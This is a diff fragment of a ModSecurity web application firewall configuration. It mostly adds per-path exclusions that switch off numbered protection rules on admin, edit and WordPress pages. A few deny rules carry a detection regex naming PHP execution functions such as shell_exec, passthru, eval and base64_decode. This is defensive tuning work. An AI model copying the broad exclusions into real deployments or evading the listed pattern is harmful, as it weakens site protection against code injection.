+SecRule REQUEST_FILENAME "/email/test\.php" "phase:2,id:91914,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/groupedit\.php" "phase:2,id:91915,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/retail_oordenkings\.edit\.php" "phase:2,id:91916,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/lesson_edit\.php" "phase:2,id:91917,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/mailtemplate_dhltrack_result\.php" "phase:2,id:91918,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/browse_links\.php" "phase:2,id:91919,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/quote_rads\.php" "phase:2,id:91920,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/tweet-blender/ws\.php" "phase:2,id:91921,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/video_edit\.php" "phase:2,id:91922,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/save\.json" "phase:2,id:91923,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/admin/test\.html" "phase:2,id:91924,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/edit\.php" "phase:2,id:91925,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-admin/nav-menus\.php" "phase:2,id:91926,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-post\.php" "phase:2,id:91927,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/portfolio/edit\.php" "phase:2,id:91928,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/pods/ajax/showform\.php" "phase:2,id:91929,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/manage/team/create\.php" "phase:2,id:91930,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/sage_download\.php" "phase:2,id:91931,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/template_content_editresult\.php" "phase:2,id:91932,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/adm/index\.php" "phase:2,id:91933,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/e_brochure_email\.php" "phase:2,id:91934,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/addlinks\.php" "phase:2,id:91935,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/adminsettings\.php" "phase:2,id:91936,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/modules/news/nav\.php" "phase:2,id:91937,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/addnews\.php" "phase:2,id:91938,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/administrator/postarticles\.php" "phase:2,id:91939,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/administrator/contactus\.php" "phase:2,id:91940,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/administrator/homepagecontent\.php" "phase:2,id:91941,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/filebrowser/umifilebrowser\.html" "phase:2,id:91942,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+
+SecRule REQUEST_FILENAME "/coupons_exclusions\.php" "phase:2,id:91943,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/voltrank" "phase:2,id:91944,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin_configvalues\.php" "phase:2,id:91945,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/processaddeditproduct\.php" "phase:2,id:91946,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/eecms\.php" "phase:2,id:91947,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/builder/postsitedata\.php" "phase:2,id:91948,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/settingsgeneralaction\.php" "phase:2,id:91949,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:91950,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/include/load_page\.php" "phase:2,id:91951,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/profile/shopsettings\.jsf" "phase:2,id:91952,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:91953,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:91954,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/jupgrade/administrator/index\.php" "phase:2,id:91955,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/v2_configvars_engine\.php" "phase:2,id:91956,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/bookingcalendar/php/save\.php" "phase:2,id:91957,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wizard/start\.php" "phase:2,id:91958,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/mailtemplateeditaction\.php" "phase:2,id:91959,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/settingscontact\.php" "phase:2,id:91960,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/property-edit\.php" "phase:2,id:91961,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/server/webissues/handler\.php" "phase:2,id:91962,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390904"
+
+SecRule REQUEST_FILENAME "/admin/db_edit\.php" "phase:2,id:91963,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/index\.php/datafeedmanager/adminhtml_datafeedmanager/save" "phase:2,id:91964,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/venue-edit\.php" "phase:2,id:91965,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:91966,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-install\.php" "phase:2,id:91967,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/products_add\.php" "phase:2,id:91968,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/admin/story_uploader\.php" "phase:2,id:91969,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+SecAction "phase:2,id:91970,t:none,pass,nolog,skipAfter:END_RULES_91970"
+
+SecRule ARGS|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:344195,rev:33,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91970
+
+SecRule REQUEST_FILENAME "/include/ajax_price\.php" "phase:2,id:91971,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/page_editor/save_page\.php" "phase:2,id:91972,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/story_prosess\.php" "phase:2,id:91973,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+SecAction "phase:2,id:91974,t:none,pass,nolog,skipAfter:END_RULES_91974"
+
+SecRule ARGS|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:344196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91974
+
+SecRule REQUEST_FILENAME "/admin/story_process\.php" "phase:2,id:91975,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+SecAction "phase:2,id:91976,t:none,pass,nolog,skipAfter:END_RULES_91976"
+
+SecRule ARGS|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:344296,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91976
+
+SecRule REQUEST_FILENAME "/seopanel/login\.php" "phase:2,id:91977,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/doku\.php" "phase:2,id:91978,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/shopperpress/ppt/ajax/actions\.php" "phase:2,id:91979,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
